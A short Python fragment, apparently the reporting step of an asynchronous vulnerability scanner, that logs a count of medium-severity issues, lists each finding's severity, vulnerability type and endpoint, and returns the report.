await self.log("info", f" Medium: {report['summary']['medium']}")
|
|
|
|
for finding in self.state.findings:
|
|
await self.log("warning", f" [{finding.severity.upper()}] {finding.vuln_type}: {finding.endpoint[:50]}")
|
|
|
|
return report
|